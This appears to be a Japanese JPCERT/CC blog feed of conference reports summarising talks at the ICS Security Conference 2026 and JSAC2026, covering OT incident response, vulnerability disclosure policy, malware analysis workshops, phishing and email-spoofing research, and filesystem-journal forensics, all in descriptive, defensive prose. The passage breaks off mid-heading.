インシデントに注目すると、この1年もランサムウェア攻撃は高止まりの状況が続き、特に製造業を中心に操業停止や出荷遅延など深刻な影響が生じています。英国の自動車メーカーや国内大手企業の事例を取り上げ、IT領域への侵害であっても結果としてOTや生産活動に重大な影響が及ぶ構造的リスクを示しました。また、国家支援型攻撃やハクティビストによる重要インフラへの攻撃、再生可能エネルギー設備やダム、水力発電所などを標的とした事例を通じ、物理的影響を伴うサイバー攻撃の現実味が増しています。 脆弱性の動向としては、CISAが公表するICS関連アドバイザリ件数の増加や、インターネットに露出したICS/OT機器の拡大が報告されていることを紹介しました。さらに、CVEプログラムの運営を巡る混乱や、欧州における新たな脆弱性データベース構想など、グローバルな脆弱性情報管理の在り方が転換期を迎えていることにも触れました。 加えて、EUのNIS2指令やIEC 62443シリーズの改訂、米国におけるCIRCIAの動向など、規制・標準の整備が進む一方で、各国の政策の進展や米国政府のCISAの体制面の揺らぎがICSセキュリティに影響を及ぼしている状況を整理しました。さらに、AIの急速な進展やポスト量子暗号への移行といった新技術に伴う課題にも目を向け、長寿命なICS環境における備えの重要性を提起しました。 全体として、表面的には大規模な破壊的攻撃が頻発した年ではなかったものの、ランサムウェアの裾野拡大、国家間対立の激化が及ぼすセキュリティへの影響、標準・制度の再編、新技術への対応など、次の時代を予感させる変化が着実に進行していることを一覧して、この1年間のICSセキュリティの動向を総括しました。 <img class="asset asset-image at-xid-4071773" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_01-640wri.png" alt="" width="640" height="360"> <h3>工場が昔からやっていた『備え』に学ぶ、制御システムインシデント対応</h3> 講演者： Claroty Ltd. APJ Sales／Senior Solution Engineer　加藤俊介氏 <a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_02_CLAROTY.pdf" target="_blank" rel="noopener" data-sourcepos="50:4-50:84">講演資料</a> <a href="https://www.youtube.com/watch?v=CaFfv8DgbTc" target="_blank" rel="noopener" data-sourcepos="51:4-51:57">YouTube</a> 加藤氏の講演では、近年のOTセキュリティ関連インシデントを振り返りつつ、工場が昔から培ってきた「備え」の考え方をサイバーインシデント対応にどう活かせるかについて解説いただきました。 インシデントの約8割はIT起因の“間接的なOT停止”であり、制御そのものが破壊されなくても、依存する上位ITシステムの停止によって操業が止まる実態が示されました。 その上で、設計・実装・運用の各段階における本質的安全設計や冗長化、フェイルセーフといった思想がサイバー攻撃に対しても有効に機能し得ることを、TRITON事案などを例に紹介。さらに、福島第一原発事故や海外製造業の事例を通じて、デジタルが失われた状況下でも、紙の記録や五感、手動操作といった“物理的実体”を活用することで事業を継続した具体例が共有されました。 Colonial PipelineやMaerskの事例では、制御システムが無事でも請求・物流などのIT停止によって事業が止まる構造が示され、機能縮退を前提としたオペレーション設計の重要性が強調されました。また、個社を超えた共助・公助による復旧事例にも触れ、有事には競争を超えた連携が鍵となることが示唆されました。 最後に、MVA（最小実行可能アーキテクチャ）、MVP（最小実行可能プロセス）、MVC（最小実行可能統制）という3つの観点から再稼働判断の枠組みを提示し、アナログ継続、デジタル予備復旧、外部活用という選択肢を事前に整理しておくことの重要性を提起。OTを深く理解することこそが、制御システムの実効的なインシデント対応力強化につながるとのメッセージで締めくくられました。 <img class="asset asset-image at-xid-4071774" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_02-640wri.png" alt="" width="640" height="360"> <h3>自動車産業におけるデジタルツインのセキュリティ課題と防御手法</h3> 講演者： TXOne Networks Inc. スレットリサーチ／シニアスレットリサーチャー　遠山千鶴氏 <a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_03_TXONE_NETWORKS.pdf" target="_blank" rel="noopener" data-sourcepos="70:4-70:91">講演資料</a> <a href="https://www.youtube.com/watch?v=pY4ZGAXh9QQ" target="_blank" rel="noopener" data-sourcepos="71:4-71:57">YouTube</a> 遠山氏の講演では、自動車産業におけるデジタルツインの活用拡大を背景に、そのセキュリティ課題と具体的な防御手法について体系的に解説いただきました。まず、デジタルツインの定義や標準の整理から始まり、現実世界の製品・設備・プロセスを仮想空間で再現し、シミュレーションや監視、最適化に活用する概念であることを確認。その上で、自動車業界がCASE（Connected、Autonomous、Shared、Electric）という「100年に一度の大変革期」にある中、開発・生産・運用の高度化を支える基盤技術としてデジタルツインが重要な役割を担っていることが示されました。 具体的な活用事例としては、トヨタによる工場内センサー最適化、HondaのV2G/V1G戦略を見据えたエネルギー管理、Hyundaiのスマート工場などが紹介され、品質向上やコスト削減、柔軟な生産体制の実現といったメリットが共有されました。一方で、物理と仮想を双方向で接続するアーキテクチャは攻撃面の拡大につながると指摘。ネットワーク偵察、データインジェクション、遅延攻撃、モデル改ざんといった想定攻撃シナリオが整理され、誤制御や生産停止、知的財産流出といった高リスクへの波及可能性が示されました。 さらに、ロール別の防御策やその限界、インシデント対応プレイブックの整備、ライフサイクル全体（開発～運用）を通じたセキュリティ設計の重要性が強調されました。Secure-by-Designの徹底と継続的監視、SOCとの連携を含む多層防御が、デジタルツイン時代の自動車産業における持続的な安全・安心の鍵であるとのメッセージが示されました。 <img class="asset asset-image at-xid-4071780" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_03-640wri.png" alt="" width="640" height="360"> <h3>サイバー攻撃に対応した安全・セキュリティ統合設計の推進</h3> 講演者： 合同会社 Forehacks 代表社員／ 名古屋工業大学ものづくり DX 研究所客員研究員　佐々木泰斗氏 <a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_04_FOREHACKS.pdf" target="_blank" rel="nofollow noreferrer noopener" data-sourcepos="86:4-86:86">講演資料</a> <a href="https://www.youtube.com/watch?v=DEyxUna4q9c" target="_blank" rel="nofollow noreferrer noopener" data-sourcepos="87:4-87:57">YouTube</a> 佐々木氏の講演では、サイバー攻撃の高度化と規制強化を背景に、制御システムにおける「安全（Safety）」と「セキュリティ（Security）」を分断せず、ライフサイクル全体で統合的に設計・管理するアプローチが提案されました。脆弱性件数の増加やEUサイバーレジリエンス法（CRA）への対応など、開発から運用・保守まで一貫した管理が求められる中で、従来のサイロ化した組織体制や断絶したドキュメント管理では限界があることが指摘されました。 その解決策として示されたのが、DFD（Data Flow Diagram）を共通の構造モデルとし、Safety要件・Security要件・SBOMを「同じ台帳」に束ねて管理する枠組みです。DFDをJSON化し、node_idやdataflow_idを索引として設計意図、解析結果、テスト要件、意思決定履歴、SBOM情報を紐づけることで、Single Source of Truth（SSOT）を実現。さらにMANIFESTファイルによってプロジェクト全体の状態や履歴を管理し、トレーサビリティーを確保する仕組みが紹介されました。 自動運転車いすの開発事例では、セーフティ解析（HARA）とセキュリティ解析（TARA）を同一モデル上で実施し、センサー故障への対策とスプーフィング攻撃対策を整合的に設計する様子が示されました。また、実装段階では設計に存在しない“ゴーストフロー”を生成AIが検知し、設計JSONとの差分評価によって是正を促す監査プロセスも紹介されました。運用段階ではSBOMとCVE情報を連携させ、脆弱性の影響範囲をID単位で追跡し、リスク受容や対処方針の判断根拠を記録する重要性が強調されました。 講演を通じて、DFDを軸に構造を整理し、生成AIを知能として組み込むことで、人が根拠を持って意思決定できる統合設計基盤を構築することが、今後の制御システムにおける安全・セキュリティ確保の鍵であるとのメッセージが示されました。 <img class="asset asset-image at-xid-4071783" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_04-640wri.png" alt="" width="640" height="360"> <h3>欧州法規制等の法的対応で関心が高まる脆弱性情報およびCVD関連の活動に関する国際動向</h3> 講演者： 一般社団法人JPCERTコーディネーションセンター 国際部 Global CVD Project Lead　伊藤智貴 <a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_05_JPCERTCC.pdf" target="_blank" rel="nofollow noreferrer noopener" data-sourcepos="104:4-104:85">講演資料</a> <a href="https://www.youtube.com/watch?v=lq4Xdslmkcc" target="_blank" rel="nofollow noreferrer noopener" data-sourcepos="105:4-105:57">YouTube</a> 本講演では、欧州法規制の進展を背景に関心が高まる脆弱性対応について、CVD（Coordinated Vulnerability Disclosure）、CVE、SBOMを軸とした国際動向と課題、そして関係者に求められる対応が整理されました。脆弱性情報は技術的正確性だけでなく、情報の受け付け・調整・公表といった運用面も含めて適切に管理されなければ、ゼロデイ悪用や対応遅延といった新たなリスクを生みます。そのため、レポーター、ベンダー、ユーザー、コーディネーター等が連携するCVDの重要性が強調されました。 CVEプログラムでは、CNAやRootの拡大、NVDを巡る混乱など最近の状況が共有され、データ品質やエンリッチメント、適切なハンドリングの必要性が指摘されました。JPCERT/CCがCNAおよびRootとして国内組織を支援していることも紹介されました。また、SBOMについては「透明化」のための手段として、部品把握とCVE突き合わせによる脆弱性管理の基盤となること、識別子の統一やカバレッジ、ツールの相違といった国際的課題が議論されている現状が示されました。 さらに、EU Cyber Resilience Act（CRA）やNIS2指令により、脆弱性公表ポリシー整備、悪用脆弱性の24時間以内報告、SBOM準備などが求められることが解説され、EU域外の企業にも影響が及ぶ可能性が示唆されました。こうした動向を踏まえ、ベンダーには脆弱性対応体制や公表ポリシー整備、サプライチェーン把握、CVE付与の検討を、ユーザーには資産把握やSBOM活用、優先度付け手法（SSVC、EPSS等）の導入を呼びかけました。国や立場を超えて、バランスの取れた形で脆弱性情報が流通・活用されるエコシステムをともに築くことの重要性が強調されました。 <img class="asset asset-image at-xid-4071787" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_05-640wri.png" alt="" width="640" height="360"> <h3>パネルセッション：脆弱性対応のための適切な資産管理手法へのチャレンジ～製造業の複数業種によるトライアル評価編～</h3> 講演&パネラー： 日本精工株式会社デジタル変革本部 ITガバナンス部／グループマネジャー　田中哲也氏 参天製薬株式会社 Digital＆IT本部／Cybersecurity Architecture & Solutions Senior Manager　正木文統氏 パナソニックオートモーティブシステムズ株式会社開発本部プラットフォーム開発センターセキュリティ開発部／係長　越智直紀氏 講演&ファシリテーター： 一般社団法人JPCERTコーディネーションセンター 国内コーディネーショングループ制御システムセキュリティシニアアナリスト河野一之 パネルセッションは会場限定で実施したため、動画配信および資料公開の予定はございません。ブログでのご紹介も差し控えます。 なお、パネルセッションのテーマで取り上げた「脆弱性対応のための適切な資産管理手法」に関心をお持ちの製造業における制御システムのセキュリティ担当者は、「ICSセキュリティ担当者コミュニティー」への参加もぜひご検討ください。参加をご希望の方は次のお問い合わせ先（制御システムセキュリティ担当）までご連絡ください。 お問い合わせ先： 国内コーディネーショングループ（制御システムセキュリティ担当） Email：<a href="mailto:info-coa@jpcert.or.jp" data-sourcepos="131:9-131:29">info-coa@jpcert.or.jp</a> <h3>閉会あいさつ</h3> 一般社団法人JPCERTコーディネーションセンター理事椎木孝斉 閉会あいさつはJPCERT/CC理事の椎木が行いました。 本カンファレンスが2009年の第1回開催から18回目を迎えたことに触れ、今回は会場開催と一部講演のアーカイブ配信という形式で実施したこと、運営の多くをJPCERT/CCが担ったことを報告しました。 また、「サイバーセキュリティ」という言葉の広がりとともに、その対象はITやネットワークにとどまらず、事業の中核を成す制御システムを含む“事業そのもの”へと拡張しているとの考えを示しました。 環境変化の中で課題に向き合う実務者にとって、本カンファレンスやJPCERT/CCの活動を実験場として活用して欲しいと呼びかけ、改めて講演者および全参加者に対する謝意を表して締めくくりとしました。 <img class="asset asset-image at-xid-4071790" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_closing-640wri.png" alt="" width="640" height="360"> <h3>おわりに</h3> 今回の制御システムセキュリティカンファレンスでは、制御システムセキュリティを取り巻く状況について、制御システムベンダー、大学付属研究所の客員研究員、ユーザー企業などさまざまな立場からご講演いただきました。本カンファレンスが、制御システムに関わる聴講者の皆さまにとって今後の活動の参考となれば幸いです。今後も開催内容を改善しつつ、国内の制御システムセキュリティの向上に資する情報の発信や知見の共有に努めて参ります。 ここまで制御システムセキュリティカンファレンス2026の開催レポートをお読みいただき、ありがとうございました。 次回の開催もご期待ください。 国内コーディネーショングループ織戸由美
JSAC2026 開催レポート～Workshop／Lightning Talk Session／Panel Discussion～

Fri, 06 Mar 2026 02:00:00 -0000

JSAC2026の講演の様子を引き続きお伝えします。第3回はWorkshop／...

 JSAC2026の講演の様子を引き続きお伝えします。 第3回はWorkshop／Lightning Talk Session／Panel Discussionについてです。 <hr /> ［Workshop 1］ <h3>Leveraging EML Analyzer to triage malicious email messages during incident response</h3> <h5>講演者：二関学、CERT Polska Michał Praszmo</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_workshop1_en.pdf">講演資料（英語）</a> 本ワークショップでは、悪性メールの解析・トリアージをテーマに、メールの仕組みや攻撃手法を整理した上で、メール検体を用いた実践的な解析手法が紹介されました。 前半では、Internet Message FormatやMIMEといったメールの基本仕様を整理しつつ、「メールがどのような経路で配送されるのか」「Receivedヘッダーの読み解き方」などについて解説が行われました。あわせて、SPF、DKIM、DMARCといったメール認証技術について、それぞれの役割や限界、実際のメールヘッダー上での確認ポイントが説明されました。 後半では、EML Analyzerを用いた実践的な解析が行われました。EML Analyzerは、EMLやMSG形式のメールを解析し、ヘッダー情報や本文、添付ファイル、URLなどを構造化して可視化できるオープンソースのツールです。参加者は、EML Analyzerを用いて以下のようなメール解析を行い、CTF形式で解析結果の提出を行いました。 　　・Message-IDの特定 　　・NDR（Non-Delivery Report）内で言及されているオリジナルメッセージのSubjectを特定 　　・見積依頼書として添付されたPDFのSHA256ハッシュ値の特定 　　・Outlook／Microsoft環境にメールをリレーした送信元ホストIPの特定 　　・ClamAVによるマルウェアスキャンを実行したホストのFQDNの特定 　　・デバッグ用に残されたヘッダーからEnvelope FROM（Return-Path）を特定 　　・X-Headerから送信元クライアントのIPアドレスを特定 　　・Roundcube XSS攻撃に用いられた攻撃者管理下のC2サーバーの特定 　　・Conversation Hijackingの痕跡から、本来の送信者の完全なメールアドレスを特定 　　・DKIM検証失敗の原因となった改変を分析し、改変前本文のハッシュ値を特定 　　・受信メールがSPFを通過したメカニズムの特定 　　・@gmail.com送信メールがDMARC検証に失敗した場合のabuseレポート送信先の特定 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/01_JSAC2026_Day1_WS1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065718" style="display: block;"/> <hr /> ［Workshop 2］ <h3>Advanced Malware Reverse Engineering: Dealing with anti analysis techniques from scratch.</h3> <h5>講演者：Palo Alto Networks, Inc. Mark Lim</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_workshop2_en.pdf">講演資料（英語）</a> 本ワークショップは、実際に観測されているマルウェアを題材に、アンチ解析技術を回避しながら内部構造を解き明かしていくハンズオン形式で行われました。 解析対象となったのは、以下の2つのマルウェアファミリーです。 　　・Guloader：多段構成を特徴とするドロッパー 　　・Gremlin：情報窃取を行うインフォスティーラ Guloaderが侵入点となり、最終的にGremlinを展開・実行する多段攻撃シナリオを想定し、実際の攻撃チェーンを意識した解析が行われました。 内容は、VBSファイルおよびPowerShellスクリプトの解析から始まり、シェルコード解析、さらにVectored Exception Handler（VEH）を用いた制御フロー難読化への対処まで、段階的に進められました。各フェーズでは、解析対象に取り組んだ後に、その背景となる仕組みや解析手法について解説が行われ、理解を深めながら学習できる構成となっていました。 解析に使用するツールやスクリプトについても具体的な説明があり、実践的な解析手法を体系的に学ぶことのできる内容でした。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/02_JSAC2026_Day1_WS2-640wri.jpg" width="640" height="361" alt="" class="asset asset-image at-xid-4065720" style="display: block;"/> <hr /> ［Workshop 3］ <h3>Re:birth the fidb: Reverse Engineering the .NET AOT Malware</h3> <h5>講演者：株式会社エヌ・エフ・ラボラトリーズ吉武暉洋、木田明宏、神章洋</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_workshop3_jp.pdf">講演資料（日本語）</a> 本ワークショップは、近年観測され始めている.NET Native AOT（Ahead-of-Time）コンパイルを利用したマルウェアを対象に、その解析手法を入門者向けに体系的かつ実践的に学ぶことを目的として実施されました。 .NETマルウェアは従来、ILコードや豊富なメタデータを保持しているため、dnSpyなどのデコンパイラを用いた解析が比較的容易でした。一方で、Native AOTでコンパイルされたバイナリはILコードを持たず、メタデータも大幅に削除されているため、従来の.NETマルウェア解析手法だけでは解析が困難となります。本ワークショップでは、こうしたNative AOT特有の課題に対する実践的な解析アプローチが解説されました。 前半では、従来の.NET（ILを含む形式）とNative AOTでコンパイルされたバイナリの違いを整理し、Native AOTでコンパイルされたプログラムの内部構造や特徴について解説が行われました。Native AOTバイナリは一見するとC++で作成されたネイティブバイナリのように見えることや、標準ライブラリが静的にリンクされることで、解析対象となるコードが膨大になる点などが紹介されました。 続いて、こうした状況に対処するための手法として、シグネチャを用いたトリアージが取り上げられました。GhidraやIDA Proを用いて標準ライブラリ由来の関数を識別し、解析対象とすべきコードを効率的に絞り込むためのシグネチャ作成および適用手順について、ハンズオン形式で解説が行われました。GhidraのFunction IDや、IDA ProのFLIRTシグネチャを活用することで、可読性が大きく向上することが確認されました。 後半では、Native AOTコンパイル時に行われるDehydrate／Rehydrateの仕組みを踏まえ、静的解析時に失われがちな文字列リテラルやオブジェクトメタデータを復元する手法が紹介されました。Ghidra用のプラグインを用いることで、動的解析を行うことなく、圧縮されたメタデータやFrozen Objectを静的に復元し、解析結果の可読性を向上させる手法についてハンズオンが行われました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/03_JSAC2026_Day2_WS3-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065721" style="display: block;"/> <hr /> ［Lightning Talk Sessions 1］ <h3>HoldingHandsRAT Attacks against Japanese company</h3> <h5>講演者：日本電気株式会社竹内俊輝</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_LT_1_toshiki_takeuchi_en.pdf">講演資料（英語）</a> 本発表では、日本企業を標的としたHoldingHandsRATによる攻撃事例について、実際に観測された攻撃メールやマルウェアの挙動をもとに解説が行われました。 HoldingHandsRATは、これまで台湾や日本、マレーシアを対象とした攻撃で使用されてきたRATであり、発表では2025年5月に観測した日本語の攻撃メールを用いて日本企業を狙った事例が紹介されました。解析の過程で確認されたPDBパスや挙動から、公開されているHoldingHandsのコードと類似した実装が用いられている点が示されました。 具体的な攻撃手法としては、「給与制度改定のお知らせ」といった業務連絡を装うメールにZIPファイルが添付され、その中にパスワードで保護されたEXEファイルと、そのパスワードを記載したテキストファイルが含まれていた事例が紹介されました。EXEファイルをパスワードで保護することで、セキュリティ製品による検知を回避しようとした可能性がある点が指摘されました。 さらに、本攻撃で使用されたマルウェアの一部には正規企業から盗用されたとみられるデジタル署名が用いられていたことや、類似した文字列を持つ複数のドメインが同時期に取得され、その多くが日本国内のIPアドレスに解決されていた点について解説されました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/04_JSAC2026_Day2_LT01-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065723" style="display: block;"/> <hr /> ［Lightning Talk Sessions 2］ <h3>ホスティングサービスの危険な同居人</h3> <h5>講演者：NTTセキュリティ・ジャパン株式会社戸祭隆行、NTTドコモビジネス株式会社冨樫良介</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_LT_2_takayuki_tomatsuri-ryosuke_togashi_jp.pdf">講演資料（日本語）</a> 本発表では、レンタルサーバーやホスティングサービスにおいて、複数の利用者が共通のメールインフラを利用することによって生じるセキュリティリスクについて、具体例を交えながら解説が行われました。 レンタルサーバーは、手軽に利用できる一方で、IPアドレスやメール送信インフラが利用者間で共有されるケースが多く存在します。発表では、このような共通インフラの特性が、SPFやDMARCといった送信元認証技術と必ずしも相性が良くない点が指摘されました。特に、送信元IPアドレスを基準とするSPFでは、同一IPレンジを共有する他利用者によるなりすましメールを識別できない場合があることが示されました。 また、事業者と利用者が同一のメールインフラを利用している場合、攻撃者が事業者を装ったメールを送信できてしまう可能性についても説明がありました。これは、事業者側のSPFレコードで許可されたIPアドレスが、結果として悪意のある利用者にも利用可能となるためです。こうした状況では、SPFやDMARCを適切に設定していても、なりすましを防ぐことが難しくなる場合があります。 発表では、こうしたリスクを把握するための一つの手法として、利用者と事業者のSPFレコードを比較するアプローチが紹介されました。外部からレンタルサービスの内部構成を把握することは困難である一方、DNS上で公開されているSPFレコードを突き合わせることで、利用者が送信に利用可能なIPアドレスが事業者のSPFに含まれているかを確認でき、当該なりすましリスクに該当するかを一定程度推測できる可能性があることが示されました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/05_JSAC2026_Day2_LT2-640wri.jpg" width="640" height="302" alt="" class="asset asset-image at-xid-4065724" style="display: block;"/> <hr /> ［Lightning Talk Sessions 3］ <h3>TOAMI・IKESU・CHOKAで実現するフィッシングサイトの“釣り上げ方”─ブラウザ拡張連携による効率的ハンティング</h3> <h5>講演者：NTTドコモビジネス株式会社坪井祐一</h5> 本発表では、フィッシング対策業務に携わる「フィッシングハンター」の作業を支援するために開発されたブラウザー拡張ツールTOAMI-投網-と、その検知結果をより効率的に活用するための拡張ツールIKESU-生簀-およびCHOKA-釣果-について紹介がありました。 TOAMI-投網-は、疑わしいURLを調査するフィッシングハンターの作業を支援するブラウザー拡張ツールで、フィッシングサイトの検知結果をログとして出力する機能を備えていることが紹介されました。 IKESU-生簀-は、TOAMI-投網-が出力した検知ログをGUI上で可視化し、一覧表示や検索、ソートを行うことを目的としています。ログを「生簀の中の魚」に見立てて管理するというコンセプトで、ブラウザー上だけで操作が完結する点が特徴として紹介されました。 さらに、IKESU-生簀-で選択した検知結果をもとに、Abuse報告文の作成や送信を支援するツールとしてCHOKA-釣果-が提案されました。 これらのツールが必要とされる背景には、フィッシングサイトの手動による詳細調査に大きな負担がかかっている現状があります。こうした調査には相応のリソースと高度なスキルが求められるため、業務の効率化と標準化を実現することが重要であり、そのためにこれらのツールを開発していると説明されました。TOAMI-投網-、IKESU-生簀-、CHOKA-釣果-を連携させることで、検知・分析・テイクダウンまでの一連の流れを効率化し、フィッシングサイトの迅速なテイクダウンに貢献していきたいとの展望が示されました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/06_JSAC2026_Day2_LT03-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065725" style="display: block;"/> <hr /> ［Lightning Talk Sessions 4］ <h3>Deceiving Developers: Abusing Legitimate GitHub Repositories to Deliver Malware</h3> <h5>講演者：GMO Cybersecurity by Ierae, Inc. Theo Webb</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_LT_4_theo_webb_en.pdf">講演資料（英語）</a> 本発表では、正規のGitHubリポジトリーを悪用し、開発者を標的としてマルウェアを配布する攻撃キャンペーンについて、その手法と背景、影響が解説されました。 発表で紹介された攻撃は、検索広告（malvertising）とGitHubのリポジトリー構造を組み合わせたものでした。攻撃者は、正規のGitHubリポジトリーをフォークし、README内のダウンロードリンクを書き換えたコミットを作成します。このコミットは、公式リポジトリー配下のURLとして表示できるため、公式リポジトリーのページと同様の形式で閲覧可能となります。 攻撃者はこのコミットへのリンクを、GitHub Desktopをキーワードにした広告として配信します。被害者が広告経由でREADMEを閲覧し、記載されたリンクからインストーラーをダウンロードすると、Windows環境ではHijackLoaderを含むマルウェアが実行され、macOS環境ではAMOS Stealerが展開されることが説明されました。 本攻撃が成立する要因として、GitHubではフォーク由来のコミットが、公式リポジトリーのURL形式で表示可能である点が挙げられました。フォークやアカウントが削除された後も、コミット自体は参照可能な場合があり、悪性コミットの追跡や完全な除去を困難にしています。また、README内のアンカーリンクを用いることで、GitHub上の警告表示を回避できる点も紹介されました。 発表の終盤では、対策として公式リポジトリーのデフォルトブランチを確認することや、READMEのリンクではなくReleasesページやベンダーの公式ダウンロードページからインストーラーを取得することの重要性が強調されました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/07_JSAC2026_Day2_LT04-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065726" style="display: block;"/> <hr /> ［Lightning Talk Sessions 5］ <h3>Unmasking Houken: Advanced TTPs and Detection</h3> <h5>講演者：PricewaterhouseCoopers Hong Kong Ruth Ng</h5> 本発表では、現代の国家支援型サイバー攻撃の分業化について、主にInitial Access Brokerに焦点をあてた解説が行われました。 講演内容についてはTLP:REDを多く含むため、詳細については割愛いたします。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/08_JSAC2026_Day2_LT05-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4065727" style="display: block;"/> <hr /> ［Lightning Talk Sessions 6］ <h3>海外投資詐欺集団の国内携帯回線の契約状況モニタリング</h3> <h5>講演者：yumano</h5> 本発表では、海外投資詐欺等で悪用される携帯電話番号に着目し、SMSを用いた本人確認の有効性を検証した調査結果が紹介されました。 ロマンス詐欺で実際に使用された携帯電話番号を収集し、契約状況や契約期間を調査した取り組みについて説明がありました。 犯行日を基準に前後約10カ月間の契約状況を分析した結果、犯行直前に回線契約が行われ、犯行終了後に解約される傾向が確認されたと報告されました。 この結果から、攻撃者が詐欺に利用する認証用の携帯電話番号を短期間に大量取得している可能性が示唆されました。そのため、SMSによる本人確認を実施していても、詐欺対策として十分な効果を発揮しない場合があることが指摘されました。 また、登録前の契約状況の確認ならびに詐欺で使用された携帯電話番号の迅速な情報共有が、被害防止に重要であると示されました。 <hr /> ［Panel Discussion］ <h3>JSAC2026レビューボードが注目した2025年のセキュリティインシデント</h3> <h5>講演者：CFP Review Board</h5> （NTTセキュリティ・ジャパン株式会社小池倫太郎、株式会社インターネットイニシアティブ小林稔、株式会社サイバーディフェンス研究所中島将太、富士通株式会社中津留勇、伊藤忠商事株式会社丹羽祐介、Palo Alto Networks, Inc. 原弘明、Google LLC Steve Su、JPCERT/CC 朝長秀誠） 2025年のセキュリティインシデントを振り返り、レビューボードメンバーが特に注目した事案についてディスカッションが行われました。 レビューボードメンバーの軽快な掛け合いによる活発な意見交換が行われましたが、内容についてはTLP:REDを多く含むため、詳細については割愛いたします。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/10_JSAC2026_Day2_panel2-640wri.jpg" width="640" height="361" alt="" class="asset asset-image at-xid-4065728" style="display: block;"/> <hr /> <h3>おわりに</h3> JSAC2026では、発表いただいたセッションの中から、特に素晴らしい情報を共有いただいたセッションの表彰を行っています。 Excellent Presentation Award（旧ベストスピーカー賞）は、参加者の皆さまからいただいたアンケート結果によってExcellent（非常に満足）評価が最も高かったセッションを選出しています。 Special Recognition Awardは、CFP Review Boardの話し合いによって決定しています。 Excellent Presentation AwardおよびSpecial Recognition Awardに選ばれた発表は、下記のとおりです。 <Excellent Presentation Award> Title：Re:birth the fidb: Reverse Engineering the .NET AOT Malware 講演者：株式会社エヌ・エフ・ラボラトリーズ吉武暉洋、木田明宏、神章洋 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/award-c73ebb2f-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-4071686" style="display: block;"/> <Special Recognition Award> Title：Unmasking the CoGUI Phishing Kit, the Major Chinese Phishing-as-a-Service Targeting Japan 講演者：TeamDonut Shadow Liu、Lime Chen、Albert Song 最後に、JSAC2026の参加者の皆さま、本レポートをご覧いただきました皆さまにこの場を借りてお礼申し上げます。 インシデントレスポンスグループ矢野雄紀
JSAC2026 開催レポート～DAY 2～

Fri, 27 Feb 2026 02:00:00 -0000

前回に引き続き、第2回は2日目に開催されたDAY 2 Main Trackの講...

<a href="https://blogs.jpcert.or.jp/ja/2026/02/jsac2026day1.html">前回</a> に引き続き、第2回は2日目に開催されたDAY 2 Main Trackの講演について紹介します。 <h3>Following the Trace: Reconstructing Attacks from Ext4 and XFS Journals</h3> <h5>講演者：株式会社インターネットイニシアティブ小林稔</h5> <a href="https://jsac.jpcert.or.jp/archive/2026/pdf/JSAC2026_2_1_minoru_kobayashi_en.pdf">講演資料（英語）</a> 小林氏は、ファイルシステムのext4およびXFSにおけるジャーナル構造とその解析手法をもとにファイル操作を推測してタイムラインとして再構築するアプローチと、小林氏が開発したジャーナル解析ツール「FJTA（Forensic Journal Timeline Analyzer）」のデモを通じて、タイムスタンプが信頼できない状況下でも従来のタイムライン解析を補完し得るジャーナル解析の有効性について講演しました。 はじめに、デジタルフォレンジックにおける従来のタイムライン解析の限界として、MACBタイムスタンプがディスク取得時点のスナップショットに過ぎず、複数回の操作履歴やtimestompingによる改ざんを原理的に反映できない点を指摘しました。その課題に対する新たなアプローチとして、Linuxで広く利用されるext4およびXFSのジャーナル機構に着目した動機を説明しました。 続いて、ext4およびXFSジャーナルの構造と解析手法を解説し、トランザクション単位で記録されるメタデータ変更情報から、ファイル作成や削除などの操作をどのように推測し、時系列に再構築するかを示しました。仕様が公開されているにもかかわらず、両ファイルシステムを実用的に解析しタイムラインとして可視化できるオープンソースツールは存在せず、The Sleuth Kitのような既存のツールで可能なのはデータ列挙にとどまる点も課題として挙げました。 その上で、FJTAのデモを通じて、ジャーナルからファイルアクティビティを検出し、従来のタイムラインでは見えなかった攻撃痕跡を可視化できることを紹介しました。さらに、実際の攻撃シナリオへの適用例や、アンチフォレンジックの限界についても言及しました。 最後に、ファイルシステムジャーナルは改ざんが難しい信頼性の高いフォレンジックアーティファクトであり、インシデントレスポンスではメモリイメージを取得後に優先的にジャーナルを収集すべきであると提言しました。ブロックデバイス解析や通常ファイル収集より高い優先度で扱うことの重要性を強調しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/JSAC2026_Day2_1.jpg" alt="JSAC2026_Day2_1.JPG" /> <h3>Unmasking the CoGUI Phishing Kit, the Major Chinese Phishing-as-a-Service Targeting Japan</h3> <h5>講演者：TeamDonut Shadow Liu、Lime Chen、Albert 